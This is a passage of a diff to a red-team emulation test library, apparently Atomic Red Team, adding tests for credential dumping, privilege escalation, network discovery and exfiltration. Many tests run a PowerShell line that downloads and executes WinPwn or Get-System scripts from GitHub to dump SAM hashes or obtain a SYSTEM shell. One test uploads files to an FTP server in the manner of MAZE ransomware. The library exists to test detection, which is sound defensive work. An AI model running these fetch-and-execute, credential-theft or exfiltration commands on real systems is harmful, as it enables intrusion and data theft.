+          \ -f %TEMP%\\PrintBrm.zip -O FORCE\n"
+        cleanup_command: 'del %TEMP%\PrintBrm.zip >nul 2>&1
+
+          '
+        name: command_prompt
   T1090.001:
     technique:
       type: attack-pattern
@@ -78251,6 +79344,48 @@ exfiltration:
           description: SMTP server to use for email transportation
           type: String
           default: 127.0.0.1
+    - name: MAZE FTP Upload
+      auto_generated_guid: 57799bc2-ad1e-4130-a793-fb0c385130ba
+      description: "This test simulates MAZE's ransomware's ability to exfiltrate
+        data via FTP.\nUpon successful execution, all 7z files within the %windir%\\temp
+        directory will be uploaded to a remote FTP server. \nReference: https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        ftp_server:
+          description: FTP Server address
+          type: String
+          default: 127.0.0.1
+        username:
+          description: Username for FTP server login
+          type: String
+          default: 
+        password:
+          description: Password for FTP server login
+          type: String
+          default: 
+      executor:
+        command: |
+          $Dir_to_copy = "$env:windir\temp"
+          $ftp = "ftp://#{ftp_server}/"
+          $web_client = New-Object System.Net.WebClient
+          $web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')
+          if (test-connection -count 1 -computername "#{ftp_server}" -quiet)
+          {foreach($file in (dir $Dir_to_copy "*.7z"))
+          {echo "Uploading $file..."
+          $uri = New-Object System.Uri($ftp+$file.name)
+          $web_client.UploadFile($uri, $file.FullName)}}
+          else
+          {echo "FTP Server Unreachable. Please verify the server address in input args and try again."}
+        cleanup_command: |
+          $ftp = "ftp://#{ftp_server}/"
+          try {foreach ($file in (dir "$env:windir\temp" "*.7z"))
+          {$uri = New-Object System.Uri($ftp+$file.name)
+           $ftp_del = [System.Net.FtpWebRequest]::create($uri)
+           $ftp_del.Credentials = New-Object System.Net.NetworkCredential('#{username}','#{password}')
+           $ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile
+           $ftp_del.GetResponse()}} catch{}
+        name: powershell
   T1567:
     technique:
       object_marking_refs:
@@ -79466,6 +80601,29 @@ initial-access:
         cleanup_command: sudo dscl . -delete /Users/AtomicUser
         name: bash
         elevation_required: true
+    - name: WinPwn - Loot local Credentials - powerhell kittie
+      auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
+      description: Loot local Credentials - powerhell kittie technique via function
+        of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          obfuskittiedump -consoleoutput -noninteractive
+        name: powershell
+    - name: WinPwn - Loot local Credentials - Safetykatz
+      auto_generated_guid: e9fdb899-a980-4ba4-934b-486ad22e22f4
+      description: Loot local Credentials - Safetykatz technique via function of WinPwn
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+          safedump -consoleoutput -noninteractive
+        name: powershell
   T1566:
     technique:
       object_marking_refs:

atomics/T1003.002/T1003.002.md

@@ -36,6 +36,8 @@ Notes:
 
 - [Atomic Test #6 - dump volume shadow copy hives with System.IO.File](#atomic-test-6---dump-volume-shadow-copy-hives-with-systemiofile)
 
+- [Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes](#atomic-test-7---winpwn---loot-local-credentials---dump-sam-file-for-ntlm-hashes)
+
 
 <br/>
 
@@ -310,4 +312,34 @@ rm $toremove -ErrorAction Ignore
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
+Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+samfile -consoleoutput -noninteractive
+```
+
+
+
+
+
+
 <br/>

atomics/T1003.002/T1003.002.yaml

@@ -169,3 +169,14 @@ atomic_tests:
     cleanup_command: |
       $toremove = #{dump_path} + "\" + '#{dumped_hive}'
       rm $toremove -ErrorAction Ignore
+- name: WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
+  auto_generated_guid: 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb
+  description: Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      samfile -consoleoutput -noninteractive  
+    name: powershell

atomics/T1003/T1003.yaml

@@ -105,3 +105,15 @@ atomic_tests:
     name: powershell
     elevation_required: true
 
+- name: My new test from atomicgui
+  description: sample test
+  supported_platforms:
+  - windows
+  input_arguments:
+    msg:
+      description: message to echo to screen
+      type: string
+      default: this is the default msg
+  executor:
+    command: 'echo #{msg}'
+    name: command_prompt

atomics/T1040/T1040.md

@@ -16,6 +16,10 @@ Network sniffing may also reveal configuration details, such as running services
 
 - [Atomic Test #4 - Windows Internal Packet Capture](#atomic-test-4---windows-internal-packet-capture)
 
+- [Atomic Test #5 - Windows Internal pktmon capture](#atomic-test-5---windows-internal-pktmon-capture)
+
+- [Atomic Test #6 - Windows Internal pktmon set filter](#atomic-test-6---windows-internal-pktmon-set-filter)
+
 
 <br/>
 
@@ -211,4 +215,72 @@ del %temp%\trace.cab >nul 2>&1
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #5 - Windows Internal pktmon capture
+Will start a packet capture and store log file as t1040.etl.
+https://lolbas-project.github.io/lolbas/Binaries/Pktmon/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** c67ba807-f48b-446e-b955-e4928cd1bf91
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+pktmon.exe start --etw  -f %TEMP%\t1040.etl
+TIMEOUT /T 5 >nul 2>&1
+pktmon.exe stop
+```
+
+#### Cleanup Commands:
+```cmd
+del %TEMP%\t1040.etl
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - Windows Internal pktmon set filter
+Select Desired ports for packet capture 
+https://lolbas-project.github.io/lolbas/Binaries/Pktmon/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 855fb8b4-b8ab-4785-ae77-09f5df7bff55
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+pktmon.exe filter add -p 445
+```
+
+#### Cleanup Commands:
+```cmd
+pktmon filter remove
+```
+
+
+
+
+
 <br/>

atomics/T1040/T1040.yaml

@@ -122,4 +122,35 @@ atomic_tests:
       del %temp%\trace.cab >nul 2>&1
     name: command_prompt
     elevation_required: true
-  
+
+- name: Windows Internal pktmon capture
+  auto_generated_guid: c67ba807-f48b-446e-b955-e4928cd1bf91
+  description: |-
+    Will start a packet capture and store log file as t1040.etl.
+    https://lolbas-project.github.io/lolbas/Binaries/Pktmon/
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      pktmon.exe start --etw  -f %TEMP%\t1040.etl
+      TIMEOUT /T 5 >nul 2>&1
+      pktmon.exe stop
+    cleanup_command: |-
+      del %TEMP%\t1040.etl
+    name: command_prompt
+    elevation_required: true  
+ 
+- name: Windows Internal pktmon set filter
+  auto_generated_guid: 855fb8b4-b8ab-4785-ae77-09f5df7bff55
+  description: |-
+    Select Desired ports for packet capture 
+    https://lolbas-project.github.io/lolbas/Binaries/Pktmon/
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      pktmon.exe filter add -p 445
+    cleanup_command: |-
+      pktmon filter remove
+    name: command_prompt
+    elevation_required: true 

atomics/T1046/T1046.md

@@ -14,6 +14,14 @@ Within cloud environments, adversaries may attempt to discover services running
 
 - [Atomic Test #4 - Port Scan using python](#atomic-test-4---port-scan-using-python)
 
+- [Atomic Test #5 - WinPwn - spoolvulnscan](#atomic-test-5---winpwn---spoolvulnscan)
+
+- [Atomic Test #6 - WinPwn - MS17-10](#atomic-test-6---winpwn---ms17-10)
+
+- [Atomic Test #7 - WinPwn - bluekeep](#atomic-test-7---winpwn---bluekeep)
+
+- [Atomic Test #8 - WinPwn - fruit](#atomic-test-8---winpwn---fruit)
+
 
 <br/>
 
@@ -209,4 +217,124 @@ echo "Python 3 must be installed manually"
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #5 - WinPwn - spoolvulnscan
+Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 54574908-f1de-4356-9021-8053dd57439a
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+spoolvulnscan -noninteractive -consoleoutput
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - WinPwn - MS17-10
+Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 97585b04-5be2-40e9-8c31-82157b8af2d6
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+MS17-10 -noninteractive -consoleoutput
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #7 - WinPwn - bluekeep
+Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 1cca5640-32a9-46e6-b8e0-fabbe2384a73
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+bluekeep -noninteractive -consoleoutput
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #8 - WinPwn - fruit
+Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** bb037826-cbe8-4a41-93ea-b94059d6bb98
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+fruit -noninteractive -consoleoutput
+```
+
+
+
+
+
+
 <br/>

atomics/T1046/T1046.yaml

@@ -120,3 +120,47 @@ atomic_tests:
     command: |
       python #{filename} -i #{host_ip}
     name: powershell
+- name: WinPwn - spoolvulnscan
+  auto_generated_guid: 54574908-f1de-4356-9021-8053dd57439a
+  description: Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      spoolvulnscan -noninteractive -consoleoutput
+    name: powershell
+- name: WinPwn - MS17-10
+  auto_generated_guid: 97585b04-5be2-40e9-8c31-82157b8af2d6
+  description: Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      MS17-10 -noninteractive -consoleoutput
+    name: powershell
+- name: WinPwn - bluekeep
+  auto_generated_guid: 1cca5640-32a9-46e6-b8e0-fabbe2384a73
+  description: Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      bluekeep -noninteractive -consoleoutput
+    name: powershell
+- name: WinPwn - fruit
+  auto_generated_guid: bb037826-cbe8-4a41-93ea-b94059d6bb98
+  description: Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      fruit -noninteractive -consoleoutput
+    name: powershell

atomics/T1048.003/T1048.003.md

@@ -16,6 +16,8 @@ Adversaries may opt to obfuscate this data, without the use of encryption, withi
 
 - [Atomic Test #5 - Exfiltration Over Alternative Protocol - SMTP](#atomic-test-5---exfiltration-over-alternative-protocol---smtp)
 
+- [Atomic Test #6 - MAZE FTP Upload](#atomic-test-6---maze-ftp-upload)
+
 
 <br/>
 
@@ -197,4 +199,61 @@ Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #6 - MAZE FTP Upload
+This test simulates MAZE's ransomware's ability to exfiltrate data via FTP.
+Upon successful execution, all 7z files within the %windir%\temp directory will be uploaded to a remote FTP server. 
+Reference: https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 57799bc2-ad1e-4130-a793-fb0c385130ba
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| ftp_server | FTP Server address | String | 127.0.0.1|
+| username | Username for FTP server login | String | |
+| password | Password for FTP server login | String | |
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$Dir_to_copy = "$env:windir\temp"
+$ftp = "ftp://#{ftp_server}/"
+$web_client = New-Object System.Net.WebClient
+$web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')
+if (test-connection -count 1 -computername "#{ftp_server}" -quiet)
+{foreach($file in (dir $Dir_to_copy "*.7z"))
+{echo "Uploading $file..."
+$uri = New-Object System.Uri($ftp+$file.name)
+$web_client.UploadFile($uri, $file.FullName)}}
+else
+{echo "FTP Server Unreachable. Please verify the server address in input args and try again."}
+```
+
+#### Cleanup Commands:
+```powershell
+$ftp = "ftp://#{ftp_server}/"
+try {foreach ($file in (dir "$env:windir\temp" "*.7z"))
+{$uri = New-Object System.Uri($ftp+$file.name)
+ $ftp_del = [System.Net.FtpWebRequest]::create($uri)
+ $ftp_del.Credentials = New-Object System.Net.NetworkCredential('#{username}','#{password}')
+ $ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile
+ $ftp_del.GetResponse()}} catch{}
+```
+
+
+
+
+
 <br/>

atomics/T1048.003/T1048.003.yaml

@@ -116,3 +116,46 @@ atomic_tests:
       description: SMTP server to use for email transportation
       type: String
       default: "127.0.0.1"
+- name: MAZE FTP Upload
+  auto_generated_guid: 57799bc2-ad1e-4130-a793-fb0c385130ba
+  description: |
+    This test simulates MAZE's ransomware's ability to exfiltrate data via FTP.
+    Upon successful execution, all 7z files within the %windir%\temp directory will be uploaded to a remote FTP server. 
+    Reference: https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
+  supported_platforms:
+  - windows
+  input_arguments:
+    ftp_server:
+      description: FTP Server address
+      type: String
+      default: 127.0.0.1
+    username:
+      description: Username for FTP server login
+      type: String
+      default:
+    password:
+      description: Password for FTP server login
+      type: String
+      default:
+  executor:
+    command: |
+      $Dir_to_copy = "$env:windir\temp"
+      $ftp = "ftp://#{ftp_server}/"
+      $web_client = New-Object System.Net.WebClient
+      $web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')
+      if (test-connection -count 1 -computername "#{ftp_server}" -quiet)
+      {foreach($file in (dir $Dir_to_copy "*.7z"))
+      {echo "Uploading $file..."
+      $uri = New-Object System.Uri($ftp+$file.name)
+      $web_client.UploadFile($uri, $file.FullName)}}
+      else
+      {echo "FTP Server Unreachable. Please verify the server address in input args and try again."}
+    cleanup_command: |
+     $ftp = "ftp://#{ftp_server}/"
+     try {foreach ($file in (dir "$env:windir\temp" "*.7z"))
+     {$uri = New-Object System.Uri($ftp+$file.name)
+      $ftp_del = [System.Net.FtpWebRequest]::create($uri)
+      $ftp_del.Credentials = New-Object System.Net.NetworkCredential('#{username}','#{password}')
+      $ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile
+      $ftp_del.GetResponse()}} catch{}
+    name: powershell

atomics/T1055.001/T1055.001.md

@@ -12,6 +12,8 @@ Running code in the context of another process may allow access to the process's
 
 - [Atomic Test #1 - Process Injection via mavinject.exe](#atomic-test-1---process-injection-via-mavinjectexe)
 
+- [Atomic Test #2 - WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique](#atomic-test-2---winpwn---get-system-shell---bind-system-shell-using-usoclient-dll-load-technique)
+
 
 <br/>
 
@@ -64,4 +66,32 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique
+Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 8b56f787-73d9-4f1d-87e8-d07e89cbc7f5
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1')
+```
+
+
+
+
+
+
 <br/>

atomics/T1055.001/T1055.001.yaml

@@ -35,3 +35,12 @@ atomic_tests:
       Stop-Process -processname notepad
     name: powershell
     elevation_required: true
+- name: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique
+  auto_generated_guid: 8b56f787-73d9-4f1d-87e8-d07e89cbc7f5
+  description: Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1')
+    name: powershell

atomics/T1078.003/T1078.003.md

@@ -10,6 +10,10 @@ Local Accounts may also be abused to elevate privileges and harvest credentials
 
 - [Atomic Test #2 - Create local account with admin privileges - MacOS](#atomic-test-2---create-local-account-with-admin-privileges---macos)
 
+- [Atomic Test #3 - WinPwn - Loot local Credentials - powerhell kittie](#atomic-test-3---winpwn---loot-local-credentials---powerhell-kittie)
+
+- [Atomic Test #4 - WinPwn - Loot local Credentials - Safetykatz](#atomic-test-4---winpwn---loot-local-credentials---safetykatz)
+
 
 <br/>
 
@@ -84,4 +88,64 @@ sudo dscl . -delete /Users/AtomicUser
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - WinPwn - Loot local Credentials - powerhell kittie
+Loot local Credentials - powerhell kittie technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 9e9fd066-453d-442f-88c1-ad7911d32912
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+obfuskittiedump -consoleoutput -noninteractive
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - WinPwn - Loot local Credentials - Safetykatz
+Loot local Credentials - Safetykatz technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** e9fdb899-a980-4ba4-934b-486ad22e22f4
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+safedump -consoleoutput -noninteractive
+```
+
+
+
+
+
+
 <br/>

atomics/T1078.003/T1078.003.yaml

@@ -37,3 +37,25 @@ atomic_tests:
       sudo dscl . -delete /Users/AtomicUser
     name: bash
     elevation_required: true
+- name: WinPwn - Loot local Credentials - powerhell kittie 
+  auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
+  description: Loot local Credentials - powerhell kittie technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      obfuskittiedump -consoleoutput -noninteractive
+    name: powershell
+- name: WinPwn - Loot local Credentials - Safetykatz
+  auto_generated_guid: e9fdb899-a980-4ba4-934b-486ad22e22f4
+  description: Loot local Credentials - Safetykatz technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      safedump -consoleoutput -noninteractive
+    name: powershell

atomics/T1082/T1082.md

@@ -32,6 +32,26 @@ Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure a
 
 - [Atomic Test #12 - Show System Integrity Protection status (MacOS)](#atomic-test-12---show-system-integrity-protection-status-macos)
 
+- [Atomic Test #13 - WinPwn - winPEAS](#atomic-test-13---winpwn---winpeas)
+
+- [Atomic Test #14 - WinPwn - itm4nprivesc](#atomic-test-14---winpwn---itm4nprivesc)
+
+- [Atomic Test #15 - WinPwn - Powersploits privesc checks](#atomic-test-15---winpwn---powersploits-privesc-checks)
+
+- [Atomic Test #16 - WinPwn - General privesc checks](#atomic-test-16---winpwn---general-privesc-checks)
+
+- [Atomic Test #17 - WinPwn - GeneralRecon](#atomic-test-17---winpwn---generalrecon)
+
+- [Atomic Test #18 - WinPwn - Morerecon](#atomic-test-18---winpwn---morerecon)
+
+- [Atomic Test #19 - WinPwn - RBCD-Check](#atomic-test-19---winpwn---rbcd-check)
+
+- [Atomic Test #20 - WinPwn - PowerSharpPack - Watson searching for missing windows patches](#atomic-test-20---winpwn---powersharppack---watson-searching-for-missing-windows-patches)
+
+- [Atomic Test #21 - WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors](#atomic-test-21---winpwn---powersharppack---sharpup-checking-common-privesc-vectors)
+
+- [Atomic Test #22 - WinPwn - PowerSharpPack - Seatbelt](#atomic-test-22---winpwn---powersharppack---seatbelt)
+
 
 <br/>
 
@@ -402,4 +422,311 @@ csrutil status
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #13 - WinPwn - winPEAS
+Discover Local Privilege Escalation possibilities using winPEAS function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** eea1d918-825e-47dd-acc2-814d6c58c0e1
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+winPEAS -noninteractive -consoleoutput
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #14 - WinPwn - itm4nprivesc
+Discover Local Privilege Escalation possibilities using itm4nprivesc function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3d256a2f-5e57-4003-8eb6-64d91b1da7ce
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+itm4nprivesc -noninteractive -consoleoutput
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #15 - WinPwn - Powersploits privesc checks
+Powersploits privesc checks using oldchecks function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 345cb8e4-d2de-4011-a580-619cf5a9e2d7
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+oldchecks -noninteractive -consoleoutput
+```
+
+#### Cleanup Commands:
+```powershell
+rm -force -recurse .\DomainRecon -ErrorAction Ignore
+rm -force -recurse .\Exploitation -ErrorAction Ignore
+rm -force -recurse .\LocalPrivEsc -ErrorAction Ignore
+rm -force -recurse .\LocalRecon -ErrorAction Ignore
+rm -force -recurse .\Vulnerabilities -ErrorAction Ignore
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #16 - WinPwn - General privesc checks
+General privesc checks using the otherchecks function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 5b6f39a2-6ec7-4783-a5fd-2c54a55409ed
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+otherchecks -noninteractive -consoleoutput
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #17 - WinPwn - GeneralRecon
+Collect general computer informations via GeneralRecon function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7804659b-fdbf-4cf6-b06a-c03e758590e8
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+Generalrecon -consoleoutput -noninteractive
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #18 - WinPwn - Morerecon
+Gathers local system information using the Morerecon function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3278b2f6-f733-4875-9ef4-bfed34244f0a
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+Morerecon -noninteractive -consoleoutput
+```
+
+
